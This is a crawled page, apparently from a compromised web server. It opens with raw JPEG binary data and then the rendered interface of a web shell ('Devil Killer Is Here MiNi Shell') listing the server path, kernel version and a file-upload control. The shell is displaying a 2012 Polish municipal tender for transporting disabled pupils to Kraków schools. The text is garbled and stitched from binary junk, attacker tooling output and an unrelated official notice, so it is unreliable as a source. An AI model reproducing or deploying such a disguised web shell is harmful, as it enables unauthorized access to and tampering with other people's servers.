JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/211638-N-2012.html

<p class="kh_header"><b>Wawrzeńczyce: Dowozów uczniów niepełnosprawnych do szkół i internatów</b><br>
<b>Numer ogłoszenia: 211638 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Igołomia-Wawrzeńczyce , Wawrzeńczyce 57, 32-125 Wawrzeńczyce, woj. małopolskie, tel. 0-12 2874003, 2874007, faks 0-12 2874003, 2874007.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozów uczniów niepełnosprawnych do szkół i internatów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Na przedmiot zamówienia składa się przewóz 17 uczniów niepełnosprawnych z terenu Gminy Igołomia-Wawrzeńczyce do (i ze) szkół specjalnych i internatów przy specjalnych ośrodkach szkolno-wychowawczych w Krakowie, pojazdem specjalistycznym dostosowanym do przewozu osób niepełnosprawnych, w tym 2 osób na wózkach inwalidzkich, w dni nauki szkolnej w okresie od 01.09.2012r. do 28.06.2013r. oraz zapewnienie opieki w czasie dowozu z poszczególnych miejscowości: 
1) Rudno Górne (1 osoba - codziennie do Zespołu Szkół Specjalnych nr 6, Gimnazjum Specjalne nr 56, ul. Ptaszyckiego 9 w Krakowie);
2) Dobranowice (3 osoby - w tym: 1 osoba codziennie do Zespołu Szkół Specjalnych nr 6, Szkoła Podstawowa Specjalna nr 79, ul. Ptaszyckiego 9 w Krakowie; 1 osoba do internatu przy Specjalnym Ośrodku Szkolno-Wychowawczym nr 6, Gimnazjum Specjalne nr 63, ul. Niecała 8 w Krakowie - dowóz w pierwszy dzień każdego tygodnia nauki szkolnej i odbiór z internatu w ostatni dzień każdego tygodnia nauki szkolnej; 1 osoba do internatu przy Specjalnym Ośrodku Szkolno-Wychowawczym Nr 3, Szkoła Podstawowa Specjalna Nr 42 ul. Praska 64 w Krakowie - dowóz w pierwszy dzień każdego tygodnia nauki szkolnej i odbiór z internatu w ostatni dzień każdego tygodnia nauki szkolnej);
3) Stręgoborzyce (1 osoba - codziennie do Specjalnego Ośrodka Szkolno-Wchowawczego dla Dzieci Niesłyszących,  Szkoła Podstawowa Specjalna ul. Spadochroniarzy 1 w Krakowie);
4) Wygnanów (1 osoba - codziennie do Zespołu Szkół Specjalnych Nr 14, Gimnazjum Specjalne nr 71, os. Sportowe 28 w Krakowie);
5) Wawrzeńczyce (3 osoby - codziennie w tym: 1 osoba do  Zespołu Szkół Specjalnych Nr 14, Szkoła Podstawowa Specjalna nr 71, os.  Sportowe 28 w Krakowie;  2 osoby do Zespołu Szkół Specjalnych Nr 6, Szkoła Gimnazjum Specjalne Nr 79, ul. Ptaszyckiego 9 w Krakowie); 
6) Złotniki (2 osoby - codziennie do Zespołu Szkół Specjalnych Nr 14, Gimnazjum Specjalne nr 71, os. Sportowe 28 w Krakowie);
7) Igołomia (2 osoby - w tym: 1 osoba codziennie do Zespołu Szkół Specjalnych Nr 6 w Krakowie, Szkoła Podstawowa Specjalna, Nr 79 ul. Ptaszyckiego 9 w Krakowie; 1 osoba do internatu przy Specjalnym Ośrodku Szkolno-Wychowawczym Nr 3, Szkoła Specjalna Przyspasabiająca do Pracy nr 9, ul. Praska 64 w Krakowie - dowóz w pierwszy dzień każdego tygodnia nauki szkolnej i odbiór z internatu w ostatni dzień każdego tygodnia nauki szkolnej);
8)  Odwiśle (1 osoba - codziennie do Zespołu Szkół Specjalnych Nr 14, Gimnazjum Specjalne nr 71, os. Sportowe 28 w Krakowie);
9) Zofipole (2 osoby - w tym: 1 osoba do internatu przy Specjalnym Ośrodku Szkolno-Wychowawczym Nr 4, Szkoła Specjalna Przyspasabiająca do Pracy nr 3, ul. Hieronima Wietora 7 w Krakowie - dowóz w pierwszy dzień każdego tygodnia nauki szkolnej i odbiór z internatu w ostatni dzień każdego tygodnia nauki szkolnej); 1 osoba codziennie do Zasadniczej Szkoły Zawodowej w Krakowie, os. Sportowe 28, 31-966 Kraków, 3 (trzy) dni w tygodniu i do Krakowskiej Hodowli Nasiennictwa Ogrodniczego POLAN Sp. z o.o., Kraków ul. Kocmyrzowska 27, 2 (dwa) dni w tygodniu w dni nauki szkolnej, z wyłączeniem dowozu porannego w każdy pierwszy dzień tygodnia nauki szkolnej i odwozu do domu ze szkoły w każdy ostatni dzień tygodnia nauki szkolnej); 
10) Tropiszów (1 osoba - codziennie do Zespołu Szkół Specjalnych w Krakowie Nr 14, Zasadnicza Szkoła Zawodowa Specjalna nr 31, os. Sportowe 28, 31-966 	Kraków, 3 (trzy) dni w tygodniu i do Krakowskiej Hodowli Nasiennictwa Ogrodniczego POLAN Sp. z o.o., Kraków ul. Kocmyrzowska 27, 2 (dwa) dni w tygodniu w dni nauki szkolnej, z wyłączeniem dowozu porannego w każdy pierwszy dzień tygodnia nauki szkolnej i odwozu do domu ze szkoły w każdy ostatni dzień tygodnia nauki szkolnej. 
2. Dowozy będą odbywać się po wyznaczonych przez Zamawiającego trasach. 
3. Planowane trasy przewozów w dni nauki szkolnej w okresie 01.09.2012r. - 28.06.2013r. z wyszczególnieniem km: 
Trasa dowozu do szkół codziennie wraz z dowozem do internatu: 
Dobranowice - Rudno Górne - Stregoborzyce - Wygnanów - Wawrzeńczyce - Złotniki - Odwiśle - Igołomia - Zofipole - Kraków ul. Ptaszyckiego 9 - Kraków os. Sportowe 28 - Kraków ul. Spadochroniarzy 1, Kraków ul. H. Wietora 7 - Kraków ul. Praska 64 - Kraków ul. Niecała 8 (razem ok. 70 km).
Trasa dowozu do szkół codziennie bez dowozu do internatu: 
Dobranowice - Rudno Górne - Stregoborzyce - Wygnanów - Wawrzeńczyce - Złotniki - Odwiśle - Igołomia - Zofipole - Tropiszów - Kraków ul. Ptaszyckiego 9 - Kraków os. Sportowe 28 -  Kraków ul. Spadochroniarzy 1 (razem ok. 55 km). 
Trasa przejazdu powrotnego do domów codziennie bez przywozów z internatów: 
Kraków ul. Spadochroniarzy 1- Kraków os. Sportowe 28 - Kraków ul. Ptaszyckiego 9 - Tropiszów - Zofipole - Igołomia - Odwiśle - Złotniki - Wawrzeńczyce - Wygnanów - Stregoborzyce - Rudno Górne - Dobranowice (razem ok. 55 km).
Trasa przejazdu powrotnego do domów codziennie wraz z przewozem z internatu: 
Kraków ul. Niecała 8 - Kraków ul. Praska 64 - Kraków ul. H. Wietora 7 - Kraków ul. Spadochroniarzy 1 - Kraków os. Sportowe 28 - Kraków ul. Ptaszyckiego 9 - Zofipole - Igołomia - Odwiśle - Złotniki - Wawrzeńczyce - Wygnanów - Stregoborzyce - Rudno Górne - Dobranowice (razem ok. 70 km). 
4. Przedmiot zamówienia jest usługą typu od drzwi do drzwi tj. usługą każdorazowo zapewniającą osobom przewożonym pomoc od wyjścia z domu lub innego miejsca do punktu docelowego. 
5.  W ramach niniejszego zamówienia Wykonawca zobowiązany jest do zapewnienia osobom przewożonym opieki ( w tym zapewnienia bezpieczeństwa oraz ochrony ich mienia). 
6. W celu spełnienia wymogów bezpieczeństwa Wykonawca do realizacji niniejszego zamówienia winien posiadać odpowiednie wyposażenie techniczne pojazdu do przewozu 17 osób niepełnosprawnych oraz 1 miejsce dla opiekuna. Pojazd musi być wyposażony w windę oraz posiadać miejsce na dwa złożone wózki inwalidzkie. Pojazd musi być w pełni sprawny technicznie.
7.  Liczba kilometrów przejechanych w danym dniu rozliczana będzie w następujący sposób: 
a) KURS PORANNY 
Od miejsca zamieszkania pierwszego zabranego do dowozu dziecka do szkoły (internatu) ostatniego dowożonego dziecka. 
b) KURS POPOŁUDNIOWY 
Od budynku szkoły (internatu) pierwszego odbieranego dziecka do wysadzenia ostatniego odwożonego dziecka w miejscu zamieszkania. 
8. W poszczególnych miesiącach dowozu Wykonawca bez uzasadnionej zgody Zamawiającego nie może wykonać więcej kilometrów niż: wrzesień 2012r. - 2400 km; październik 2012r. - 2700 km; listopad 2012r. - 2500 km; grudzień 2012r. - 1800 km; styczeń 2013r. - 1400 km; luty 2013r. - 2400 km; marzec 2013r. - 2300 km; kwiecień 2013r. - 2300 km; maj 2013r. -  2400 km; czerwiec 2013r. - 2400 km..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi przedstawić koncesję, zezwolenie lub licencję zezwalającą na prowadzenie działalności gospodarczej w zakresie objętym zamówieniem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał usługi, a w przypadku świadczeń okresowych lub ciągłych również, że wykonuje usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie przewozu osób niepełnosprawnych na łączną kwotę, co najmniej 70.000,00 zł (słownie: siedemdziesiąt tysięcy złotych). Wykonawca sporządzi wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych (również wykonywanych), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że do realizacji zamówienia dysponuje lub będzie dysponował co najmniej 1 pojazdem sprawnym technicznie, wyposażonym w windę, o ilości miejsc siedzących min. 15 dla dzieci + 1 dla opiekuna oraz posiadający miejsce na 2 (dwa) złożone wózki inwalidzkie. Wskazany w ofercie pojazd musi posiadać aktualne badania techniczne.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że do realizacji zamówienia dysponuje lub będzie dysponował: co najmniej 1 osobą pełniącą rolę kierowcy, posiadającą aktualne uprawnienia do kierowania pojazdami w zakresie przewozu osób oraz co najmniej 1 osobą pełniącą rolę opiekuna, posiadającą udokumentowane przeszkolenie w zakresie udzielania pierwszej pomocy medycznej lub przedmedycznej. Osoba opiekuna każdorazowo podczas wykonywania usługi/przedmiotu zamówienia zobowiązana jest pełnić opiekę nad przewożonymi uczniami niepełnosprawnymi. Nie dopuszcza się, aby funkcję opiekuna pełnił kierowca.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 tys. zł (słownie: sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy (wg Zał. Nr 2 do SIWZ). Jeżeli o udzielenie zamówienia Wykonawcy ubiegają się wspólnie - ofertę podpisuje Pełnomocnik. W miejscu nazwa i adres Wykonawcy należy wpisać dane dotyczące konsorcjum (wymienić wszystkich Wykonawców wspólnie ubiegających się o zamówienie).
2.Wykaz pojazdów dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi pojazdami. W wykazie należy uwzględnić co najmniej 1 pojazd sprawny technicznie, wyposażony w windę, o ilości miejsc siedzących min. 14 oraz posiadający miejsce na 1 (jeden) złożony wózek inwalidzki. Wymieniony w wykazie pojazd musi posiadać aktualne badania techniczne (wg Zał. Nr 7 do SIWZ).
3.Parafowany na każdej stronie wzór umowy stanowiący Zał. Nr 1 do SIWZ.
4.Pełnomocnictwo, jeżeli Wykonawca jest reprezentowany w sposób inny, niż to wynika z zapisu we właściwym rejestrze, zgodnie z art. 23 ustawy PZP dotyczy także Wykonawców występujących wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. 
2. Pod rygorem nieważności niedopuszczalna jest zarówno zmiana postanowień umowy jak i wprowadzenie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
3. W przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy dopuszcza się: 
a)zmianę ilości dowożonych dzieci (zwiększyć lub zmniejszyć). Zmiana ta może skutkować zmianą ilości przejechanych kilometrów w miesiącu oraz zmianą trasy dowozu.
b)zmianę kluczowego personelu niezbędnego do wykonywania zamówienia po stronie Wykonawcy (np. kierowca autobusu, opiekun). Zamawiający/Wykonawca wyrazi zgodę na zmianę personelu drugiej strony tylko w przypadku potwierdzenia wystąpienia okoliczności niezależnych od Wykonawcy czy Zamawiającego. W szczególności mogą to być okoliczności powodujące, iż wskazana osoba nie będzie mogła wykonywać swojej pracy. 
c)zmianę godzin dowozu i odwozu dzieci niepełnosprawnych. Powodem takiej zmiany mogą być zmiany organizacyjne w placówce szkolnej, wytyczne nadrzędnej Instytucji Oświatowej;
d) pojazdu wskazanego w ofercie do realizacji zamówienia. Powodem takiej zmiany może być okoliczność skutkująca niemożliwością wykonywania usługi za pomocą wskazanego w ofercie przetargowej pojazdu. Potrzeba zmiany może wynikać również ze zmian organizacyjnych Wykonawcy jak również Zamawiającego. Zmieniony autobus musi posiadać aktualne ubezpieczenie, aktualny przegląd techniczny oraz wymaganą ilość miejsc siedzących.
4. Zmiany treści i warunków umowy mogą nastąpić również w przypadku:
a) konieczności zawieszenia przez Zamawiającego wykonywania usługi. 
b) wystąpienia siły wyższej. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.
c) rezygnacji przez Zamawiającego z części usługi, wprowadzenie usługi zamiennej, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy. 
d) zmiany wartości umowy w sytuacji zmiany urzędowej stawki podatku VAT na oferowany przedmiot zamówienia. Zmiana taka może nastąpić od dnia wejścia w życie podpisanego aneksu do niniejszej umowy na podstawie pisemnego zgłoszenia Wykonawcy. 
e) konieczności wprowadzenia nowej trasy. 
f) zmiany ilości kilometrów (zwiększenia bądź zmniejszenia długości tras). 
g) zmiany ilości dowożonych uczniów. 
5. Zmiany, o których mowa powyżej w ust. 4 odnoszą się do proporcjonalnego zmniejszenia lub zwiększenia kosztów przedmiotu zamówienia w zależności od charakteru zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igwa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Igołomia - Wawrzeńczyce 32-125 Wawrzeńczyce 57.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2012 godzina 10:30, miejsce: Urząd Gminy Igołomia - Wawrzeńczyce 32-125 Wawrzeńczyce 57, Sekretariat Urzędu Gminy pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
